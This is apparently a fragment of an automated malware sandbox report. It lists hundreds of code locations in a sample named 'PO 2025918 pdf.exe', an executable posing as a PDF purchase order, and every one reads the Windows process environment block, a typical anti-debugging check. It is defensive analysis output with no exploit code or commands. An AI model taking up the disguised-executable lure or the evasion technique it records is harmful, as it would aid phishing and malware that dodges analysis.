                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0170E1D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E1D0 mov eax, dword ptr fs:[00000030h]5_2_0170E1D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E1D0 mov eax, dword ptr fs:[00000030h]5_2_0170E1D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017561C3 mov eax, dword ptr fs:[00000030h]5_2_017561C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017561C3 mov eax, dword ptr fs:[00000030h]5_2_017561C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D0185 mov eax, dword ptr fs:[00000030h]5_2_016D0185
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171019F mov eax, dword ptr fs:[00000030h]5_2_0171019F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171019F mov eax, dword ptr fs:[00000030h]5_2_0171019F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171019F mov eax, dword ptr fs:[00000030h]5_2_0171019F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171019F mov eax, dword ptr fs:[00000030h]5_2_0171019F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01734180 mov eax, dword ptr fs:[00000030h]5_2_01734180
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01734180 mov eax, dword ptr fs:[00000030h]5_2_01734180
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174C188 mov eax, dword ptr fs:[00000030h]5_2_0174C188
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174C188 mov eax, dword ptr fs:[00000030h]5_2_0174C188
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168A197 mov eax, dword ptr fs:[00000030h]5_2_0168A197
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168A197 mov eax, dword ptr fs:[00000030h]5_2_0168A197
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168A197 mov eax, dword ptr fs:[00000030h]5_2_0168A197
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BC073 mov eax, dword ptr fs:[00000030h]5_2_016BC073
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716050 mov eax, dword ptr fs:[00000030h]5_2_01716050
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01692050 mov eax, dword ptr fs:[00000030h]5_2_01692050
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01726030 mov eax, dword ptr fs:[00000030h]5_2_01726030
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168A020 mov eax, dword ptr fs:[00000030h]5_2_0168A020
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168C020 mov eax, dword ptr fs:[00000030h]5_2_0168C020
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01714000 mov ecx, dword ptr fs:[00000030h]5_2_01714000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01732000 mov eax, dword ptr fs:[00000030h]5_2_01732000
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE016 mov eax, dword ptr fs:[00000030h]5_2_016AE016
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE016 mov eax, dword ptr fs:[00000030h]5_2_016AE016
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE016 mov eax, dword ptr fs:[00000030h]5_2_016AE016
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE016 mov eax, dword ptr fs:[00000030h]5_2_016AE016
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016980E9 mov eax, dword ptr fs:[00000030h]5_2_016980E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0168A0E3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017160E0 mov eax, dword ptr fs:[00000030h]5_2_017160E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168C0F0 mov eax, dword ptr fs:[00000030h]5_2_0168C0F0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D20F0 mov ecx, dword ptr fs:[00000030h]5_2_016D20F0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017120DE mov eax, dword ptr fs:[00000030h]5_2_017120DE
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017560B8 mov eax, dword ptr fs:[00000030h]5_2_017560B8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017560B8 mov ecx, dword ptr fs:[00000030h]5_2_017560B8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017280A8 mov eax, dword ptr fs:[00000030h]5_2_017280A8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169208A mov eax, dword ptr fs:[00000030h]5_2_0169208A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173437C mov eax, dword ptr fs:[00000030h]5_2_0173437C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175A352 mov eax, dword ptr fs:[00000030h]5_2_0175A352
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171035C mov eax, dword ptr fs:[00000030h]5_2_0171035C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171035C mov eax, dword ptr fs:[00000030h]5_2_0171035C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171035C mov eax, dword ptr fs:[00000030h]5_2_0171035C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171035C mov ecx, dword ptr fs:[00000030h]5_2_0171035C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171035C mov eax, dword ptr fs:[00000030h]5_2_0171035C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171035C mov eax, dword ptr fs:[00000030h]5_2_0171035C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01712349 mov eax, dword ptr fs:[00000030h]5_2_01712349
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA30B mov eax, dword ptr fs:[00000030h]5_2_016CA30B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA30B mov eax, dword ptr fs:[00000030h]5_2_016CA30B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA30B mov eax, dword ptr fs:[00000030h]5_2_016CA30B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168C310 mov ecx, dword ptr fs:[00000030h]5_2_0168C310
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B0310 mov ecx, dword ptr fs:[00000030h]5_2_016B0310
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A03E9 mov eax, dword ptr fs:[00000030h]5_2_016A03E9
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C63FF mov eax, dword ptr fs:[00000030h]5_2_016C63FF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE3F0 mov eax, dword ptr fs:[00000030h]5_2_016AE3F0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE3F0 mov eax, dword ptr fs:[00000030h]5_2_016AE3F0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE3F0 mov eax, dword ptr fs:[00000030h]5_2_016AE3F0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017343D4 mov eax, dword ptr fs:[00000030h]5_2_017343D4
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017343D4 mov eax, dword ptr fs:[00000030h]5_2_017343D4
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A3C0 mov eax, dword ptr fs:[00000030h]5_2_0169A3C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A3C0 mov eax, dword ptr fs:[00000030h]5_2_0169A3C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A3C0 mov eax, dword ptr fs:[00000030h]5_2_0169A3C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A3C0 mov eax, dword ptr fs:[00000030h]5_2_0169A3C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A3C0 mov eax, dword ptr fs:[00000030h]5_2_0169A3C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A3C0 mov eax, dword ptr fs:[00000030h]5_2_0169A3C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016983C0 mov eax, dword ptr fs:[00000030h]5_2_016983C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016983C0 mov eax, dword ptr fs:[00000030h]5_2_016983C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016983C0 mov eax, dword ptr fs:[00000030h]5_2_016983C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016983C0 mov eax, dword ptr fs:[00000030h]5_2_016983C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017163C0 mov eax, dword ptr fs:[00000030h]5_2_017163C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0174C3CD mov eax, dword ptr fs:[00000030h]5_2_0174C3CD
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E388 mov eax, dword ptr fs:[00000030h]5_2_0168E388
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E388 mov eax, dword ptr fs:[00000030h]5_2_0168E388
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E388 mov eax, dword ptr fs:[00000030h]5_2_0168E388
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B438F mov eax, dword ptr fs:[00000030h]5_2_016B438F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B438F mov eax, dword ptr fs:[00000030h]5_2_016B438F
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01688397 mov eax, dword ptr fs:[00000030h]5_2_01688397
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01688397 mov eax, dword ptr fs:[00000030h]5_2_01688397
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01688397 mov eax, dword ptr fs:[00000030h]5_2_01688397
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01740274 mov eax, dword ptr fs:[00000030h]5_2_01740274
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168826B mov eax, dword ptr fs:[00000030h]5_2_0168826B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694260 mov eax, dword ptr fs:[00000030h]5_2_01694260
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694260 mov eax, dword ptr fs:[00000030h]5_2_01694260
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694260 mov eax, dword ptr fs:[00000030h]5_2_01694260
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696259 mov eax, dword ptr fs:[00000030h]5_2_01696259
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01718243 mov eax, dword ptr fs:[00000030h]5_2_01718243
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01718243 mov ecx, dword ptr fs:[00000030h]5_2_01718243
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168A250 mov eax, dword ptr fs:[00000030h]5_2_0168A250
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168823B mov eax, dword ptr fs:[00000030h]5_2_0168823B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02E1 mov eax, dword ptr fs:[00000030h]5_2_016A02E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02E1 mov eax, dword ptr fs:[00000030h]5_2_016A02E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02E1 mov eax, dword ptr fs:[00000030h]5_2_016A02E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02A0 mov eax, dword ptr fs:[00000030h]5_2_016A02A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02A0 mov eax, dword ptr fs:[00000030h]5_2_016A02A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov ecx, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE284 mov eax, dword ptr fs:[00000030h]5_2_016CE284
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE284 mov eax, dword ptr fs:[00000030h]5_2_016CE284
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710283 mov eax, dword ptr fs:[00000030h]5_2_01710283
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710283 mov eax, dword ptr fs:[00000030h]5_2_01710283
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710283 mov eax, dword ptr fs:[00000030h]5_2_01710283
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C656A mov eax, dword ptr fs:[00000030h]5_2_016C656A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C656A mov eax, dword ptr fs:[00000030h]5_2_016C656A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C656A mov eax, dword ptr fs:[00000030h]5_2_016C656A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698550 mov eax, dword ptr fs:[00000030h]5_2_01698550
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698550 mov eax, dword ptr fs:[00000030h]5_2_01698550
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01726500 mov eax, dword ptr fs:[00000030h]5_2_01726500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC5ED mov eax, dword ptr fs:[00000030h]5_2_016CC5ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC5ED mov eax, dword ptr fs:[00000030h]5_2_016CC5ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016925E0 mov eax, dword ptr fs:[00000030h]5_2_016925E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE5CF mov eax, dword ptr fs:[00000030h]5_2_016CE5CF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE5CF mov eax, dword ptr fs:[00000030h]5_2_016CE5CF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016965D0 mov eax, dword ptr fs:[00000030h]5_2_016965D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA5D0 mov eax, dword ptr fs:[00000030h]5_2_016CA5D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA5D0 mov eax, dword ptr fs:[00000030h]5_2_016CA5D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017105A7 mov eax, dword ptr fs:[00000030h]5_2_017105A7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017105A7 mov eax, dword ptr fs:[00000030h]5_2_017105A7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017105A7 mov eax, dword ptr fs:[00000030h]5_2_017105A7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B45B1 mov eax, dword ptr fs:[00000030h]5_2_016B45B1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B45B1 mov eax, dword ptr fs:[00000030h]5_2_016B45B1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C4588 mov eax, dword ptr fs:[00000030h]5_2_016C4588
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01692582 mov eax, dword ptr fs:[00000030h]5_2_01692582
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01692582 mov ecx, dword ptr fs:[00000030h]5_2_01692582
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE59C mov eax, dword ptr fs:[00000030h]5_2_016CE59C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C460 mov ecx, dword ptr fs:[00000030h]5_2_0171C460
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BA470 mov eax, dword ptr fs:[00000030h]5_2_016BA470
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BA470 mov eax, dword ptr fs:[00000030h]5_2_016BA470
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BA470 mov eax, dword ptr fs:[00000030h]5_2_016BA470
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
